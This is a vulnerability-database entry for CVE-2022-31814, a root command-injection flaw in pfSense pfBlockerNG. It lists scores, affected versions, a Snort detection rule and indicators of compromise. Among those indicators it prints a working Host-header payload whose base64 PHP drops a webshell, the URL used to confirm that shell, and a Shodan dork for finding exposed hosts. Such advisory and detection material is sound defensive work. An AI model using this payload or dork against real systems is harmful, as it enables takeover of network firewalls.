cbcvebase.
CVE-2022-31814
published 2022-09-05

CVE-2022-31814: pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE…

PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
86.45%
99.7th percentile
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.

Affected

2 ranges
VendorProductVersion rangeFixed in
netgatepfblockerng<= 2.1.4_26
pfsensepfblockerng< 2.1.4_272.1.4_27

Detection & IOCsextracted from sources · hover to see the quote

url/pfblockerng/www/index.php
path/pfblockerng/www/index.php
filenamesystem_advanced_control.php
path/usr/local/www/system_advanced_control.php
url/system_advanced_control.php?c=id
command' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pfblockerng/www/index.php"; fast_pattern; http.host; content:"|2a 3b|"; startswith; reference:url,www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/; reference:cve,2022-31814; classtype:attempted-admin; sid:2044629; rev:1; metadata:affected_product IoT, attack_target Networking_Equipment, created_at 2023_03_15, cve CVE_2022_31814, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_15, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|2a 3b|
  • Exploit sends a GET request to /pfblockerng/www/index.php with shell metacharacters (e.g., ' *; ... ;') injected into the HTTP Host header to achieve unauthenticated RCE as root.
  • The Snort/ET rule detects the attack by matching GET requests to /pfblockerng/www/index.php where the HTTP Host header starts with bytes 0x2a 0x3b (i.e., '* ;'), indicating shell metacharacter injection.
  • After successful exploitation, a PHP webshell is dropped at /usr/local/www/system_advanced_control.php and accessed via GET parameter 'c' for command execution. Presence of this file on a pfSense host is a strong indicator of compromise.
  • Successful shell upload can be confirmed by checking for 'uid=0(root) gid=0(wheel)' in the response to /system_advanced_control.php?c=id.
  • The Nuclei template confirms exploitation by checking that the initial response body to /pfblockerng/www/index.php contains 'GIF', and then verifying a DNS interaction via interactsh, indicating OOB callback from the injected Host header command.
  • Shodan dork can be used to identify exposed pfSense instances potentially running pfBlockerNG: search for http.title:"pfSense - Login" with Server: nginx and Set-Cookie: PHPSESSID=.
  • ·Only pfBlockerNG versions 2.1.4_26 and below are affected; version 3.x is explicitly unaffected. Ensure detection rules are scoped accordingly to avoid false positives on patched or v3.x installations.
  • ·pfBlockerNG is not installed by default on pfSense; the attack surface only exists on systems where the plugin has been explicitly installed.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.